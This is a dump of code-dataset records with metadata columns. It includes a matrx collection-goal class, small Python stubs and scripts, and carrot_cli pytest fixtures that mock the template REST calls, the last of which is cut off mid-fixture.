                    and self.__area_name == obj.properties['collection_zone_name']\
                    and 'collection_objects' in obj.properties and 'is_drop_off_target' in obj.properties\
                    and obj.properties['is_drop_off_target']:
                self.__target = obj.properties['collection_objects'].copy()

        # Raise warning if no target object was found.
        if len(self.__target) == 0:
            warnings.warn(f"The CollectionGoal {self.__area_name} could not find a {CollectionTarget.__name__} "
                          f"object or its 'collection_objects' property is empty.")

    def __check_completion(self, grid_world):
        """Compare the objects currently at the drop-off locations against the
        requested objects and return whether the goal is satisfied.

        Maintains `__dropped_objects` (object id -> tick of first detection)
        across calls and, when order matters, updates `__attained_rank`.
        """
        # If we were already done before, we return the past values
        if self.is_done:
            return self.is_done

        # Get the current tick number
        curr_tick = grid_world.current_nr_ticks

        # Retrieve all objects and the drop locations (this is the most performance heavy; it loops over all drop locs
        # and queries the world to locate all objects at that point through distance calculation. Note: this calculation
        # is not required, as the range is zero!).
        obj_ids = [obj_id for loc in self.__drop_off_locs
                   for obj_id in grid_world.get_objects_in_range(loc, sense_range=0, object_type=None).keys()]

        # Get all world objects and agents
        all_objs = grid_world.environment_objects
        all_agents = grid_world.registered_agents
        all_ = {**all_objs, **all_agents}

        # Go through all objects at the drop off locations. If an object was not already detected before as a
        # required object, check if it is one of the desired objects. Also, ignore all drop off tiles and targets.
        detected_objs = {}
        for obj_id in obj_ids:
            obj_props = all_[obj_id].properties
            # Check if the object is either a collection area tile or a collection target object, if so skip it
            if ("is_drop_off" in obj_props.keys() and "collection_area_name" in obj_props.keys()) \
                    or ("is_drop_off_target" in obj_props.keys() and "collection_zone_name" in obj_props.keys()
                        and "is_invisible" in obj_props.keys()):
                continue
            # An object counts as detected when one of the requested property
            # dicts is a subset of its (flattened) properties.
            for req_props in self.__target:
                obj_props = utils._flatten_dict(obj_props)
                if req_props.items() <= obj_props.items():
                    detected_objs[obj_id] = curr_tick

        # Now compare the detected objects with the previous detected objects to see if any new objects were detected
        # and thus should be added to the dropped objects
        is_updated = False
        for obj_id in detected_objs.keys():
            if obj_id not in self.__dropped_objects.keys():
                is_updated = True
                self.__dropped_objects[obj_id] = detected_objs[obj_id]

        # Check if any objects detected previously are now not detected anymore, as such they need to be removed.
        removed = []
        for obj_id in self.__dropped_objects.keys():
            if obj_id not in detected_objs.keys():
                removed.append(obj_id)
        for obj_id in removed:
            is_updated = True
            self.__dropped_objects.pop(obj_id, None)

        # If required (and needed), check if the dropped objects are dropped in order by tracking the rank up which the
        # dropped objects satisfy the requested order.
        if self.__in_order and is_updated:
            # Sort the dropped objects based on the tick they were detected (in ascending order)
            sorted_dropped_obj = sorted(self.__dropped_objects.items(), key=lambda x: x[1], reverse=False)
            rank = 0
            for obj_id, tick in sorted_dropped_obj:
                props = all_[obj_id].properties
                props = utils._flatten_dict(props)
                req_props = self.__target[rank]
                if req_props.items() <= props.items():
                    rank += 1
                else:
                    # as soon as the next object is not the one we expect, we stop the search at this attained rank.
                    break
            # The goal is done as soon as the attained rank is equal to the number of requested objects
            is_satisfied = rank == len(self.__target)
            # Store the attained rank, used to measure the progress
            self.__attained_rank = rank
        # objects do not need to be collected in order and new ones were dropped
        elif is_updated:
            # The goal is done when the number of collected objects equal the number of requested objects
            is_satisfied = len(self.__dropped_objects) == len(self.__target)
        # no new objects detected, so just return the past values
        else:
            is_satisfied = self.is_done

        return is_satisfied

    def get_progress(self, world_state, grid_world):
        """Return the fraction of the requested objects that has been collected.

        When `in_order` is True this is the attained rank divided by the number
        of requested objects; otherwise it is the number of collected objects
        divided by the number of requested objects. Neither parameter is read
        when the goal is already done.
        """
        # If we are done, just return 1.0
        if self.is_done:
            return 1.0

        # Check if the order matters, if so calculated the progress based on the maximum attained rank of correct
        # ordered collected objects.
        if self.__in_order:
            # Progress is the currently attained rank divided by the number of requested objects
            progress = self.__attained_rank / len(self.__target)
        # If the order does not matter, just calculate the progress as the number of correctly collected/dropped
        # objects.
        else:
            # Progress the is the number of collected objects divided by the total number of requested objects
            progress = len(self.__dropped_objects) / len(self.__target)

        return progress

    @classmethod
    def get_random_order_property(cls, possibilities, length=None, with_duplicates=False):
        """ Creates a `RandomProperty` representing a list of potential objects to collect in a certain order.

        Parameters
        ----------
        possibilities: iterable
            An iterable (e.g. list, tuple, etc.) of dictionaries representing property_name, property_value pairs that
            can be collected.
        length: int (optional, default None)
            The number of objects that need to be sampled from `possibilities` to be collected.
        with_duplicates: bool (optional, default False)
            Whether entries in `possibilities` can occur more than once in the lists.

        Returns
        -------
        RandomProperty
            A random property representing all possible lists of collection objects. Each list differs in the order of
            the objects. If length < len(possibilities), not all objects may be in each list. If with_duplicates=True,
            some objects might occur more than once in a list. This random property can be given to a `CollectionGoal`
            who will sample one of these lists every time a world is run. This allows a world with a `CollectionGoal`
            to denote different collection goals each time but still based on all properties in `possibilities`.

        Examples
        --------
        >>> from matrx import WorldBuilder
        >>> from matrx.logger import LogActions
        >>> from matrx.objects import SquareBlock
        >>> from matrx.goals import CollectionGoal
        >>> builder = WorldBuilder(shape=(3, 3))
        >>> builder.add_object([0, 0], "Red Block", callable_class=SquareBlock, visualize_colour="#eb4034")
        >>> builder.add_object([1, 1], "Blue Block", callable_class=SquareBlock, visualize_colour="#3385e8")

        Add a collection goal, where we should collect red and blue blocks but every time we run the world, in a different
        order. To do so, we need to pass a RandomProperty to `add_collection_goal` which it uses to sample such an
        order each created world. We call this utility method to get us such a RandomProperty.

        >>> rp_order = CollectionGoal.get_random_order_property([{'visualize_colour': 'eb4034'}, {'visualize_colour': '3385e8'}])
        >>> builder.add_collection_goal("Drop", [(2, 2)], rp_order, in_order=True)

        See Also
        --------
        :meth:`matrx.world_builder.WorldBuilder.add_collection_goal`
            The method that receives this return value.
        :class:`matrx.world_builder.RandomProperty`
            The class representing a property with a random value each world creation.
        """
        # Default to using every possibility exactly once.
        if length is None:
            length = len(possibilities)

        if not with_duplicates:
            orders = itertools.permutations(possibilities, r=length)
        else:  # with_duplicates
            orders = itertools.product(possibilities, repeat=length)

        # Materialize the iterator so RandomProperty receives a concrete list.
        orders = list(orders)
        rp_orders = matrx.world_builder.RandomProperty(values=orders)

        return rp_orders
| 45.245358
| 130
| 0.623567
| 4,375
| 34,115
| 4.665371
| 0.0912
| 0.036157
| 0.011758
| 0.010974
| 0.971241
| 0.971241
| 0.971241
| 0.971241
| 0.968791
| 0.967909
| 0
| 0.005046
| 0.308721
| 34,115
| 753
| 131
| 45.305445
| 0.86045
| 0.502741
| 0
| 0.937931
| 0
| 0.003448
| 0.08028
| 0.017087
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096552
| false
| 0.013793
| 0.024138
| 0
| 0.210345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d562af3cb6e6904bc25753c74260601fe90b34d2
| 89
|
py
|
Python
|
tests/data/import_from_return_single.in.py
|
bmerry/trollius-fixers
|
0ba4eba4ccc9795d0996ba8bd778e5651e0954ce
|
[
"MIT"
] | null | null | null |
tests/data/import_from_return_single.in.py
|
bmerry/trollius-fixers
|
0ba4eba4ccc9795d0996ba8bd778e5651e0954ce
|
[
"MIT"
] | null | null | null |
tests/data/import_from_return_single.in.py
|
bmerry/trollius-fixers
|
0ba4eba4ccc9795d0996ba8bd778e5651e0954ce
|
[
"MIT"
] | null | null | null |
from trollius import From
from trollius import Return
from trollius import ensure_future
| 22.25
| 34
| 0.865169
| 13
| 89
| 5.846154
| 0.461538
| 0.473684
| 0.710526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 89
| 3
| 35
| 29.666667
| 0.987013
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d589d9d0bfea6b225b90c142ce4ea0fe2636129e
| 385
|
py
|
Python
|
scripts/get_figures.py
|
stanfordmlgroup/lca-code
|
bca8c2fcccadb4a5d83a6e566a441483e31d6b37
|
[
"MIT"
] | 8
|
2020-03-04T22:16:06.000Z
|
2022-02-13T20:04:49.000Z
|
scripts/get_figures.py
|
stanfordmlgroup/lca-code
|
bca8c2fcccadb4a5d83a6e566a441483e31d6b37
|
[
"MIT"
] | 2
|
2020-03-23T21:43:40.000Z
|
2020-05-06T13:17:39.000Z
|
scripts/get_figures.py
|
stanfordmlgroup/lca-code
|
bca8c2fcccadb4a5d83a6e566a441483e31d6b37
|
[
"MIT"
] | 4
|
2020-02-09T23:24:08.000Z
|
2022-01-10T07:21:28.000Z
|
# Figure panels and the CAM-visualization directory each one is taken from.
_panels = [
    ("(a) atelectasis", "results/U-Final-Sanity/test/visuals/cams/91"),
    # ("(b) consolidation", "results/U-Final-Sanity/test/visuals/cams/20"),
    ("(b) consolidation", "results/U-Final-Sanity/test/visuals/cams/76"),
    ("(c) cardiomegaly", "results/U-Final-Sanity/test/visuals/cams/80"),
    ("(d) multi-view bilateral effusion", "results/U-Final-Sanity/test/visuals/cams/146"),
]
for _label, _cam_dir in _panels:
    print(_label, _cam_dir)
| 77
| 90
| 0.742857
| 58
| 385
| 4.931034
| 0.413793
| 0.13986
| 0.227273
| 0.332168
| 0.727273
| 0.727273
| 0.727273
| 0.370629
| 0.370629
| 0.370629
| 0
| 0.029891
| 0.044156
| 385
| 5
| 90
| 77
| 0.747283
| 0.18961
| 0
| 0
| 0
| 0
| 0.81672
| 0.55627
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
635d638721d71ec9932eecf76e9709bb6ff7a55e
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_0/_mod1_1_1_0_0_3.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_0/_mod1_1_1_0_0_3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_0/_pkg1_1_1_0_0/_mod1_1_1_0_0_3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# Auto-generated placeholder bindings (completion test data): only the names
# matter for the star-import propagation test; the None values are never read.
name1_1_1_0_0_3_0 = None
name1_1_1_0_0_3_1 = None
name1_1_1_0_0_3_2 = None
name1_1_1_0_0_3_3 = None
name1_1_1_0_0_3_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.4
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
636ce59e5ab8a617b4db0697e96cb36d3669fd85
| 40
|
py
|
Python
|
com/android/monkeyrunner/MonkeyRunner.py
|
laricchia/MonkeyDatasetExecutor
|
45568ae24f7f3c2f19adeaec9ad72448dfdc6506
|
[
"MIT"
] | null | null | null |
com/android/monkeyrunner/MonkeyRunner.py
|
laricchia/MonkeyDatasetExecutor
|
45568ae24f7f3c2f19adeaec9ad72448dfdc6506
|
[
"MIT"
] | null | null | null |
com/android/monkeyrunner/MonkeyRunner.py
|
laricchia/MonkeyDatasetExecutor
|
45568ae24f7f3c2f19adeaec9ad72448dfdc6506
|
[
"MIT"
] | null | null | null |
def waitForConnection():
    """Stub replacement for MonkeyRunner.waitForConnection; always reports success."""
    connected = True
    return connected
| 20
| 24
| 0.75
| 4
| 40
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 40
| 2
| 25
| 20
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
639eb6a08efd88df74f440ec338e1dc462f7342e
| 60,946
|
py
|
Python
|
tests/unit/template/test_template_command.py
|
broadinstitute/carrot_cli
|
c3a580753e76e2f7fa3c0423fe7073754cc1ba8b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/template/test_template_command.py
|
broadinstitute/carrot_cli
|
c3a580753e76e2f7fa3c0423fe7073754cc1ba8b
|
[
"BSD-3-Clause"
] | 18
|
2021-06-04T19:44:52.000Z
|
2022-02-23T19:34:47.000Z
|
tests/unit/template/test_template_command.py
|
broadinstitute/carrot_cli
|
c3a580753e76e2f7fa3c0423fe7073754cc1ba8b
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import logging
from click.testing import CliRunner
import mockito
import pytest
from carrot_cli.__main__ import main_entry as carrot
from carrot_cli.config import manager as config
from carrot_cli.rest import runs, template_reports, template_results, templates
@pytest.fixture(autouse=True)
def unstub():
    """Autouse fixture: undo all mockito stubbing after each test so stubs never leak."""
    yield
    mockito.unstub()
@pytest.fixture(autouse=True)
def no_email():
    """Autouse fixture: by default no email is configured; tests needing one re-stub it."""
    mockito.when(config).load_var_no_error("email").thenReturn(None)
@pytest.fixture(
params=[
{
"args": ["template", "find_by_id", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template will save Etheria",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "Sword of Protection template",
"pipeline_id": "3d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "find_by_id", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_by_id_data(request):
    """Parametrized fixture: stub templates.find_by_id and return this case's data dict."""
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).find_by_id(...).thenReturn(None)
    # Mock up request response (args[2] is the template id on the CLI command line)
    mockito.when(templates).find_by_id(request.param["args"][2]).thenReturn(
        request.param["return"]
    )
    return request.param
def test_find_by_id(find_by_id_data):
    """`template find_by_id` prints the stubbed response followed by a newline."""
    expected = find_by_id_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, find_by_id_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"find",
"--template_id",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--pipeline_id",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--name",
"Sword of Protection template",
"--pipeline_name",
"Sword of Protection pipeline",
"--description",
"This template will save Etheria",
"--test_wdl",
"example.com/rebellion_test.wdl",
"--eval_wdl",
"example.com/rebellion_eval.wdl",
"--created_by",
"adora@example.com",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(name)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"Sword of Protection template",
"Sword of Protection pipeline",
"This template will save Etheria",
"example.com/rebellion_test.wdl",
"example.com/rebellion_eval.wdl",
"adora@example.com",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"asc(name)",
1,
0,
],
"return": json.dumps(
[
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template will save Etheria",
"test_wdl": "example.com/rebellion_test.wdl",
"eval_wdl": "example.com/rebellion_eval.wdl",
"name": "Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
}
],
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"find",
"--template_id",
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
],
"params": [
"986325ba-06fe-4b1a-9e96-47d4f36bf819",
"",
"",
"",
"",
"",
"",
"",
"",
"",
"",
20,
0,
],
"return": json.dumps(
{
"title": "No templates found",
"status": 404,
"detail": "No templates found with the specified parameters",
},
indent=4,
sort_keys=True,
),
},
]
)
def find_data(request):
    """Parametrized fixture: stub templates.find for the `template find` tests.

    Returns the parametrization dict (CLI args, expected REST params, and the
    response the stub should return).
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).find(...).thenReturn(None)
    # Mock the one call whose argument list matches this case's expected params.
    # Unpacking the list replaces the error-prone params[0]..params[12] indexing
    # and automatically stays correct if the parameter count changes.
    mockito.when(templates).find(*request.param["params"]).thenReturn(
        request.param["return"]
    )
    return request.param
def test_find(find_data):
    """`template find` prints the stubbed response followed by a newline."""
    expected = find_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, find_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": [
"template",
"create",
"--pipeline_id",
"d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--name",
"Sword of Protection template",
"--description",
"This template will save Etheria",
"--test_wdl",
"example.com/she-ra_test.wdl",
"--eval_wdl",
"example.com/she-ra_eval.wdl",
"--created_by",
"adora@example.com",
],
"params": [
"Sword of Protection template",
"d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"This template will save Etheria",
"example.com/she-ra_test.wdl",
"example.com/she-ra_eval.wdl",
"adora@example.com",
],
"return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template will save Etheria",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
},
{
"args": [
"template",
"create",
"--pipeline_id",
"d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"--name",
"Sword of Protection template",
"--description",
"This template will save Etheria",
"--test_wdl",
"example.com/she-ra_test.wdl",
"--eval_wdl",
"example.com/she-ra_eval.wdl",
],
"params": [],
"logging": "No email config variable set. If a value is not specified for --created by, "
"there must be a value set for email.",
},
{
"args": ["template", "create"],
"params": [],
"return": "Usage: carrot_cli template create [OPTIONS]\n"
"Try 'carrot_cli template create --help' for help.\n"
"\n"
"Error: Missing option '--pipeline_id'.",
},
]
)
def create_data(request):
    """Parametrized fixture: stub templates.create for the `template create` tests.

    Returns the parametrization dict; cases with an empty "params" list are
    expected to fail before reaching the REST layer (missing option / no email).
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).create(...).thenReturn(None)
    # Mock up request response only if we expect it to get that far
    if request.param["params"]:
        # Unpack instead of indexing params[0]..params[5] one by one
        mockito.when(templates).create(*request.param["params"]).thenReturn(
            request.param["return"]
        )
    return request.param
def test_create(create_data, caplog):
    """`template create` prints the stubbed response, or logs a config error."""
    outcome = CliRunner().invoke(carrot, create_data["args"])
    expected_log = create_data.get("logging")
    if expected_log is not None:
        assert expected_log in caplog.text
    else:
        assert outcome.output == create_data["return"] + "\n"
@pytest.fixture(
params=[
{
"args": [
"template",
"update",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--description",
"This new template replaced the broken one",
"--name",
"New Sword of Protection template",
"--test_wdl",
"example.com/she-ra_test.wdl",
"--eval_wdl",
"example.com/she-ra_eval.wdl",
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"New Sword of Protection template",
"This new template replaced the broken one",
"example.com/she-ra_test.wdl",
"example.com/she-ra_eval.wdl",
],
"return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
},
{
"args": ["template", "update"],
"params": [],
"return": "Usage: carrot_cli template update [OPTIONS] ID\n"
"Try 'carrot_cli template update --help' for help.\n"
"\n"
"Error: Missing argument 'ID'.",
},
]
)
def update_data(request):
    """Parametrized fixture: stub templates.update for the `template update` tests.

    Returns the parametrization dict; cases with an empty "params" list are
    expected to fail argument parsing before reaching the REST layer.
    """
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).update(...).thenReturn(None)
    # Mock up request response only if we expect it to get that far
    if request.param["params"]:
        # Unpack instead of indexing params[0]..params[4] one by one
        mockito.when(templates).update(*request.param["params"]).thenReturn(
            request.param["return"]
        )
    return request.param
def test_update(update_data):
    """`template update` prints the stubbed response followed by a newline."""
    expected = update_data["return"] + "\n"
    invocation = CliRunner().invoke(carrot, update_data["args"])
    assert invocation.output == expected
@pytest.fixture(
params=[
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": [
"template",
"delete",
"-y",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
},
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": json.dumps(
{"message": "Successfully deleted 1 row"}, indent=4, sort_keys=True
),
"interactive": {
"input": "y",
"message": "Template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 was created by adora@example.com. "
"Are you sure you want to delete? [y/N]: y\n",
},
},
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"created_at": "2020-09-16T18:48:06.371563",
"created_by": "adora@example.com",
"description": "This template replaced the broken one",
"test_wdl": "example.com/she-ra_test.wdl",
"eval_wdl": "example.com/she-ra_eval.wdl",
"name": "New Sword of Protection template",
"pipeline_id": "4d1bfbab-d9ec-46c7-aa8e-9c1d1808f2b8",
"template_id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
},
indent=4,
sort_keys=True,
),
"email": "catra@example.com",
"return": "",
"interactive": {
"input": "n",
"message": "Template with id cd987859-06fe-4b1a-9e96-47d4f36bf819 was created by adora@example.com. "
"Are you sure you want to delete? [y/N]: n",
},
"logging": "Okay, aborting delete operation",
},
{
"args": ["template", "delete", "cd987859-06fe-4b1a-9e96-47d4f36bf819"],
"id": "cd987859-06fe-4b1a-9e96-47d4f36bf819",
"find_return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
"email": "adora@example.com",
"return": json.dumps(
{
"title": "No template found",
"status": 404,
"detail": "No template found with the specified ID",
},
indent=4,
sort_keys=True,
),
},
]
)
def delete_data(request):
    """Parametrized fixture: stub templates.delete/find_by_id and the configured email.

    find_by_id is stubbed too because the delete command looks the record up
    first (to show who created it before confirming deletion).
    """
    # We want to load the value from "email" from config
    mockito.when(config).load_var("email").thenReturn(request.param["email"])
    # Set all requests to return None so only the one we expect will return a value
    mockito.when(templates).delete(...).thenReturn(None)
    mockito.when(templates).find_by_id(...).thenReturn(None)
    # Mock up request response
    mockito.when(templates).delete(request.param["id"]).thenReturn(
        request.param["return"]
    )
    mockito.when(templates).find_by_id(request.param["id"]).thenReturn(
        request.param["find_return"]
    )
    return request.param
def test_delete(delete_data, caplog):
    """`template delete` prints the delete response; interactive cases also echo the
    confirmation prompt, and aborted cases log a message instead."""
    caplog.set_level(logging.INFO)
    runner = CliRunner()
    # Include interactive input and expected message if this test should trigger interactive stuff
    if "interactive" in delete_data:
        expected_output = (
            delete_data["interactive"]["message"] + delete_data["return"] + "\n"
        )
        result = runner.invoke(
            carrot, delete_data["args"], input=delete_data["interactive"]["input"]
        )
        assert result.output == expected_output
    else:
        result = runner.invoke(carrot, delete_data["args"])
        assert result.output == delete_data["return"] + "\n"
    # If we expect logging that we want to check, make sure it's there
    if "logging" in delete_data:
        assert delete_data["logging"] in caplog.text
@pytest.fixture(
params=[
{
"args": [
"template",
"find_runs",
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"--name",
"Queen of Bright Moon run",
"--status",
"succeeded",
"--test_input",
"tests/data/mock_test_input.json",
"--eval_input",
"tests/data/mock_eval_input.json",
"--test_cromwell_job_id",
"d9855002-6b71-429c-a4de-8e90222488cd",
"--eval_cromwell_job_id",
"03958293-6b71-429c-a4de-8e90222488cd",
"--created_before",
"2020-10-00T00:00:00.000000",
"--created_after",
"2020-09-00T00:00:00.000000",
"--created_by",
"glimmer@example.com",
"--finished_before",
"2020-10-00T00:00:00.000000",
"--finished_after",
"2020-09-00T00:00:00.000000",
"--sort",
"asc(name)",
"--limit",
1,
"--offset",
0,
],
"params": [
"cd987859-06fe-4b1a-9e96-47d4f36bf819",
"Queen of Bright Moon run",
"succeeded",
{"in_greeted": "Cool Person"},
{"in_output_filename": "test_greeting.txt"},
"d9855002-6b71-429c-a4de-8e90222488cd",
"03958293-6b71-429c-a4de-8e90222488cd",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"glimmer@example.com",
"2020-10-00T00:00:00.000000",
"2020-09-00T00:00:00.000000",
"asc(name)",
1,
0,
],
"return": json.dumps(
[
{
"created_at": "2020-09-16T18:48:06.371563",
"finished_at": "2020-09-16T18:58:06.371563",
"created_by": "glimmer@example.com",
"test_input": {"in_mother": "Angella"},
"eval_input": {"in_friend": "Bow"},
"status": "succeeded",
"results": {},
"test_cromwell_job_id": "d9855002-6b71-429c-a4de-8e90222488cd",
